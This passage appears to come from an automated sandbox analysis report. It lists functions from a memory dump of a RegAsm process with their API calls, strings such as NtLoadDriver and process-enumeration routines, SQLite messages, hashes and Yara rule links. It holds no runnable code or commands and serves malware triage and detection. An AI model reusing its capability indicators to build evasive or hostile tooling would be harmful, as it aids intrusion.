                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                          Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                          Download Yara Rule
                          APIs
                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                          • KillTimer.USER32(?,00000041), ref: 004060D7
                          • KillTimer.USER32(?,00000041), ref: 004060E8
                          • GetTickCount.KERNEL32 ref: 0040610B
                          • GetParent.USER32(?), ref: 00406136
                          • SendMessageW.USER32(00000000), ref: 0040613D
                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                          • String ID: A
                          • API String ID: 2892645895-3554254475
                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                          Function 0041352F Relevance: 17.5, APIs: 1, Strings: 9, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                          • API String ID: 4139908857-2887671607
                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                          Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                            • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                          • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                          • strchr.MSVCRT ref: 0040C140
                          • strchr.MSVCRT ref: 0040C151
                          • _strlwr.MSVCRT ref: 0040C15F
                          • memset.MSVCRT ref: 0040C17A
                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                          • String ID: 4$h
                          • API String ID: 4019544885-1856150674
                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                          Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                          • String ID: 0$6
                          • API String ID: 4066108131-3849865405
                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                          Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004082EF
                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                          • memset.MSVCRT ref: 00408362
                          • memset.MSVCRT ref: 00408377
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$ByteCharMultiWide
                          • String ID:
                          • API String ID: 290601579-0
                          • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                          • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                          Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free$wcslen
                          • String ID:
                          • API String ID: 3592753638-3916222277
                          • Opcode ID: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                          • Opcode Fuzzy Hash: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                          Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040A47B
                          • _snwprintf.MSVCRT ref: 0040A4AE
                          • wcslen.MSVCRT ref: 0040A4BA
                          • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                          • wcslen.MSVCRT ref: 0040A4E0
                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpywcslen$_snwprintfmemset
                          • String ID: %s (%s)$YV@
                          • API String ID: 3979103747-598926743
                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                          Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                          • wcslen.MSVCRT ref: 0040A6B1
                          • wcscpy.MSVCRT ref: 0040A6C1
                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                          • wcscpy.MSVCRT ref: 0040A6DB
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                          • String ID: Unknown Error$netmsg.dll
                          • API String ID: 2767993716-572158859
                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                          Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                          • unable to open database: %s, xrefs: 0042F84E
                          • out of memory, xrefs: 0042F865
                          • cannot ATTACH database within transaction, xrefs: 0042F663
                          • database %s is already in use, xrefs: 0042F6C5
                          • database is already attached, xrefs: 0042F721
                          • too many attached databases - max %d, xrefs: 0042F64D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                          • API String ID: 1297977491-2001300268
                          • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                          • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                          Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                          Download Yara Rule
                          APIs
                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                          • Sleep.KERNEL32(00000001), ref: 004178E9
                          • GetLastError.KERNEL32 ref: 004178FB
                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$ErrorLastLockSleepUnlock
                          • String ID:
                          • API String ID: 3015003838-0
                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                          Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                          • wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                          • wcslen.MSVCRT ref: 0040D1D3
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                          • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                          • String ID: strings
                          • API String ID: 3166385802-3030018805
                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                          Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040D8BD
                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                          • memset.MSVCRT ref: 0040D906
                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                          • _wcsicmp.MSVCRT ref: 0040D92F
                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                          • String ID: sysdatetimepick32
                          • API String ID: 1028950076-4169760276
                          • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                          • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                          Function 004044A4 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 52librarywindowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Library$FreeLoadMessage
                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                          • API String ID: 3897320386-317687271
                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                          Function 004138C1 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                          • API String ID: 4271163124-70141382
                          • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                          • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                          Function 0041383D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                          • API String ID: 4139908857-3953557276
                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                          Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                          Download Yara Rule
                          APIs
                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                          • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                          • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                          • memset.MSVCRT ref: 0041BA3D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: -journal$-wal
                          • API String ID: 438689982-2894717839
                          • Opcode ID: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                          • Opcode Fuzzy Hash: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                          Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00418836
                          • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                          • GetCurrentProcessId.KERNEL32 ref: 00418856
                          • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                          • GetTickCount.KERNEL32 ref: 0041887D
                          • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                          • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                          • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                          • String ID:
                          • API String ID: 4218492932-0
                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                          Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                          • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: gj
                          • API String ID: 438689982-4203073231
                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                          Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ItemMenu$CountInfomemsetwcschr
                          • String ID: 0$6
                          • API String ID: 2029023288-3849865405
                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                          Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                          • memset.MSVCRT ref: 00405455
                          • memset.MSVCRT ref: 0040546C
                          • memset.MSVCRT ref: 00405483
                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$memcpy$ErrorLast
                          • String ID: 6$\
                          • API String ID: 404372293-1284684873
                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                          Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: AttributesErrorFileLastSleep$free
                          • String ID:
                          • API String ID: 1470729244-0
                          • Opcode ID: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                          • Opcode Fuzzy Hash: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
